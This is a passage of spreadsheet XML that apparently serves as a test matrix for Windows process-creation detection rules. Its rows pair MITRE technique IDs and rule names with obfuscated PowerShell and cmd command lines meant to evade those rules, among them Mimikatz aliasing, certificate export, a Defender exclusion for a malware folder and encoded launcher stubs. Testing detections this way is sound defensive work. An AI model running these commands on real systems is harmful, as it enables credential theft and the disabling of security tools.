      <c r="G1012" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1012" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1012" s="44" t="n"/>
      <c r="J1012" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1012" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1013" ht="15.75" customHeight="1" s="42">
      <c r="A1013" s="44" t="n"/>
      <c r="B1013" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1013" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1013" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1013" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1013" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1013" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1013" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1013" s="43" t="n"/>
      <c r="J1013" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1013" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1014" ht="15.75" customHeight="1" s="42">
      <c r="A1014" s="44" t="n"/>
      <c r="B1014" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1014" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1014" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1014" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1014" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1014" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1014" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1014" s="43" t="n"/>
      <c r="J1014" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1014" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1015" ht="15.75" customHeight="1" s="42">
      <c r="A1015" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1015" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1015" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1015" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1015" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F1015" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1015" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1015" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1015" s="43" t="n"/>
      <c r="J1015" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1015" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1016" ht="15.75" customHeight="1" s="42">
      <c r="A1016" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1016" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1016" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1016" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1016" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1016" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1016" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1016" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1016" s="43" t="n"/>
      <c r="J1016" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1016" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1017" ht="15.75" customHeight="1" s="42">
      <c r="A1017" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1017" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1017" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1017" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1017" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1017" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1017" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1017" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1017" s="43" t="n"/>
      <c r="J1017" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1017" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1018" ht="15.75" customHeight="1" s="42">
      <c r="A1018" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1018" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1018" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1018" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1018" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1018" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1018" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1018" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1018" s="44" t="n"/>
      <c r="J1018" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1018" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1019" ht="15.75" customHeight="1" s="42">
      <c r="A1019" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1019" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1019" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1019" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1019" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1019" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1019" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1019" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1019" s="43" t="n"/>
      <c r="J1019" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1019" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1020" ht="15.75" customHeight="1" s="42">
      <c r="A1020" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1020" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C1020" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D1020" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E1020" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F1020" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1020" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1020" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1020" s="43" t="n"/>
      <c r="J1020" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1020" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1021" ht="15.75" customHeight="1" s="42">
      <c r="A1021" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1021" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C1021" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D1021" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E1021" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F1021" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1021" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1021" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1021" s="44" t="n"/>
      <c r="J1021" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1021" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1022" ht="15.75" customHeight="1" s="42">
      <c r="A1022" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1022" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C1022" s="44" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D1022" s="44" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E1022" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F1022" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1022" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1022" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1022" s="44" t="n"/>
      <c r="J1022" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1022" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1023" ht="15.75" customHeight="1" s="42">
      <c r="A1023" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1023" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C1023" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D1023" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E1023" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\\temp\\cert.pfx\"</t>
        </is>
      </c>
      <c r="F1023" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1023" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1023" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1023" s="43" t="n"/>
      <c r="J1023" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1023" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1024" ht="15.75" customHeight="1" s="42">
      <c r="A1024" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1024" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1024" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1024" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1024" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F1024" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1024" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1024" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1024" s="43" t="n"/>
      <c r="J1024" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1024" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1025" ht="15.75" customHeight="1" s="42">
      <c r="A1025" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1025" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1025" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1025" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1025" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1025" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1025" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1025" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1025" s="44" t="n"/>
      <c r="J1025" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1025" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1026" ht="15.75" customHeight="1" s="42">
      <c r="A1026" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1026" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1026" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1026" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1026" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1026" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1026" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1026" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1026" s="44" t="n"/>
      <c r="J1026" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1026" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1027" ht="15.75" customHeight="1" s="42">
      <c r="A1027" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1027" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1027" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1027" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1027" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F1027" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1027" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1027" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1027" s="44" t="n"/>
      <c r="J1027" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1027" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1028" ht="15.75" customHeight="1" s="42">
      <c r="A1028" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1028" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1028" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1028" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1028" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1028" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1028" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1028" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1028" s="43" t="n"/>
      <c r="J1028" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1028" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1029" ht="15.75" customHeight="1" s="42">
      <c r="A1029" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1029" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1029" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1029" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1029" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1029" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1029" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1029" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1029" s="43" t="n"/>
      <c r="J1029" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1029" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1030" ht="15.75" customHeight="1" s="42">
      <c r="A1030" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B1030" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C1030" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1030" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E1030" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F1030" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1030" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1030" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1030" s="44" t="n"/>
      <c r="J1030" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1030" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1031" ht="15.75" customHeight="1" s="42">
      <c r="A1031" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B1031" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C1031" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1031" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E1031" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F1031" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1031" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1031" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1031" s="44" t="n"/>
      <c r="J1031" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1031" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1032" ht="15.75" customHeight="1" s="42">
      <c r="A1032" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B1032" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1032" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1032" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1032" s="44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1032" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1032" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1032" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1032" s="43" t="n"/>
      <c r="J1032" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1032" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1033" ht="15.75" customHeight="1" s="42">
      <c r="A1033" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B1033" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1033" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1033" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1033" s="44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1033" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1033" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1033" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1033" s="44" t="n"/>
      <c r="J1033" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1033" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1034" ht="15.75" customHeight="1" s="42">
      <c r="A1034" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B1034" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1034" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1034" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1034" s="44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F1034" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1034" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1034" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1034" s="43" t="n"/>
      <c r="J1034" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1034" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1035" ht="15.75" customHeight="1" s="42">
      <c r="A1035" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B1035" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1035" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1035" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1035" s="44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F1035" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1035" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1035" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1035" s="43" t="n"/>
      <c r="J1035" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1035" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1036" ht="15.75" customHeight="1" s="42">
      <c r="A1036" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B1036" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1036" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1036" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1036" s="44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F1036" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1036" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1036" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1036" s="43" t="n"/>
      <c r="J1036" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1036" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1037" ht="15.75" customHeight="1" s="42">
      <c r="A1037" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B1037" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C1037" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D1037" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E1037" s="44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F1037" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1037" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1037" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1037" s="43" t="n"/>
      <c r="J1037" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1037" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1038" ht="15.75" customHeight="1" s="42">
      <c r="A1038" s="44" t="n"/>
      <c r="B1038" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1038" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1038" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1038" s="44" t="inlineStr">
        <is>
          <t>$o = New-Object IO.MemoryStream; $data = [System.Convert]::FromBase64String('...'); iex ([System.Text.Encoding]::ASCII.GetString($data))</t>
        </is>
      </c>
      <c r="F1038" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1038" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1038" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1038" s="43" t="n"/>
      <c r="J1038" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1038" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1039" ht="15.75" customHeight="1" s="42">
      <c r="A1039" s="44" t="n"/>
      <c r="B1039" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1039" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1039" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1039" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F1039" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1039" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1039" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1039" s="44" t="n"/>
      <c r="J1039" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1039" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1040" ht="15.75" customHeight="1" s="42">
      <c r="A1040" s="44" t="n"/>
      <c r="B1040" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1040" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D1040" s="44" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E1040" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"e" cwB2ACAAbwAgA...</t>
        </is>
      </c>
      <c r="F1040" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1040" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1040" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1040" s="44" t="n"/>
      <c r="J1040" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1040" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1041" ht="15.75" customHeight="1" s="42">
      <c r="A1041" s="43" t="n"/>
      <c r="B1041" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C1041" s="44" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
